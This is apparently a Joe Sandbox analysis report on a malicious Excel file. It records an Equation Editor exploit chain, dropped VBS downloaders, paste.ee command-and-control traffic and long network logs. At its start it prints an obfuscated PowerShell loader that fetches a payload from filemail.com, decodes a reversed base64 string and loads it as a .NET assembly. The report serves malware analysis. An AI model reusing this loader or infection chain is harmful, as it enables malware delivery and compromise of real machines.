vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.454
        Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3660, TargetFilename: C:\Users\user\AppData\Local\Temp\z5l0pclt.lfa.ps1

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: fUHl7rElXU.xlsxAvira: detected
        Multi AV Scanner detection for submitted file
        Source: fUHl7rElXU.xlsxReversingLabs: Detection: 71%

        Exploits

        barindex
        Office equation editor establishes network connection
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.168.7.19 Port: 80Jump to behavior
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49165 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49166 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

        Spreading

        barindex
        Yara detected VBS Downloader Generic
        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\webmadamMPDW-constraints[1].vbs, type: DROPPED

        Software Vulnerabilities

        barindex
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Shellcode detected
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A0477 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035A0477
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A03EA LoadLibraryW,2_2_035A03EA
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A04A5 ShellExecuteW,ExitProcess,2_2_035A04A5
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A0490 ShellExecuteW,ExitProcess,2_2_035A0490
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A04CA ExitProcess,2_2_035A04CA
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A030F ExitProcess,2_2_035A030F
        Suspicious execution chain found
        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: paste.ee
        Source: global trafficDNS query: name: 1017.filemail.com
        Source: global trafficDNS query: name: 1017.filemail.com
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.7.19:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.6:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.7.19:80
        Source: global trafficTCP traffic: 104.168.7.19:80 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.7.19:80
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.7.19:80
        Source: global trafficTCP traffic: 104.168.7.19:80 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 104.168.7.19:80 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.7.19:80
        Source: global trafficTCP traffic: 104.168.7.19:80 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.7.19:80
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.168.7.19:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.6:80
        Source: global trafficTCP traffic: 188.114.97.6:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.6:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.6:80
        Source: global trafficTCP traffic: 188.114.97.6:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 188.114.97.6:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.6:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.6:80
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
        Source: global trafficTCP traffic: 188.114.97.6:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 142.215.209.78:443 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.97.6 443Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
        Connects to a pastebin service (likely for C&C)
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A0477 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035A0477
        Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
        Source: Joe Sandbox ViewIP Address: 188.114.97.6 188.114.97.6
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: global trafficHTTP traffic detected: GET /d/OARvm HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
        Source: global trafficHTTP traffic detected: GET /webmadamMPDW-constraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.19Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /d/OARvm HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
        Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49165 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49166 version: TLS 1.0
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.19
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.19
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.19
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.19
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.19
        Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.19
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A0477 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035A0477
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/vbscriptContent-Encoding: gzipLast-Modified: Wed, 20 Nov 2024 13:11:26 GMTAccept-Ranges: bytesETag: "0533db44d3bdb1:0"Vary: Accept-EncodingServer: Microsoft-IIS/10.0Date: Wed, 04 Dec 2024 11:21:00 GMTContent-Length: 1965Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ec 5a 6b 6f 1b 45 17 9e cf af c4 7f b0 fc 01 1c d4 6e 2e 55 11 8a 00 11 d2 cb 5b 48 d3 52 87 b6 08 21 64 c7 eb da ad 6f f5 da 49 da 1f 0f 3c e7 9c 19 7b 76 67 66 af 09 34 12 5a ad ed dd 99 39 f7 eb 8c ff fa f3 33 f5 3f 45 f7 23 b5 56 33 75 ae 56 6a ac e6 f8 d5 52 43 d5 53 13 dc e7 2a 56 1d b5 50 4b 8c cc 30 7e 86 ef 73 f5 0e 6f 57 ea 0e e6 25 78 a2 b1 05 9e 8f 79 ed 0a 63 57 7a 74 bb ee 18 b0 16 b8 fb 78 9e e0 26 4c 31 56 ef 30 fe 96 be 1e e0 ed 14 df 03 1e 23 fc 09 ae b9 c6 34 c7 9b 01 de 0d 40 ed 12 df f6 ca 2e 53 e4 ae 6c a9 6f 4b d1 11 a9 d7 c0 3c 51 a7 58 43 30 7c b0 5d 0a 04 7a 16 67 84 cf 18 cf 31 4b b4 cb 98 df f0 b3 81 de 51 6d 50 91 40 ca 87 ea 79 21 6d 6d 2d 25 9b a6 27 58 db 62 78 21 ca 9e e0 ad 99 31 d2 34 b4 a0 bf 11 60 ce 52 b0 b2 d2 ef a9 b7 6c 0f 2b 86 d7 c3 bb 58 eb 95 f4 40 fa 26 aa 16 98 bd e4 37 6f 19 e7 1a f3 e8 a6 37 2b a6 61 a6 de e3 0d f1 21 1a ec 31 8c 84 e1 1a 98 73 2f 25 46 e2 61 4a 44 f2 61 eb 8b d4 cf 58 19 f3 4d 12 9e 63 4e 8c ef ad be 1f 33 8e 17 f8 24 d8 5d a6 39 66 1c 47 18 7f ad 9e aa 13 d6 d3 56 3f 0f 30 7e c1 f6 1f 17 ea 2a cb d1 31 fb d3 84 65 b3 06 04 92 14 49 a8 93 c3 a3 1f 52 9e bc d2 ba 11 19 85 e1 57 b1 d3 83 94 a5 36 91 84 a1 35 6d 35 42 6b 9a fe 34 7d 86 a6 84 a9 fa 52 fd a6 be b7 68 93 5f 0b 58 f7 9c ad 6a c5 1a 9f 83 9f 25 d3 47 1e d0 03 8e 2f c0 45 8f df 4d 99 0e b2 09 e2 66 88 91 df 83 34 bb f6 6c e8 15 9b 5b 72 a4 ec 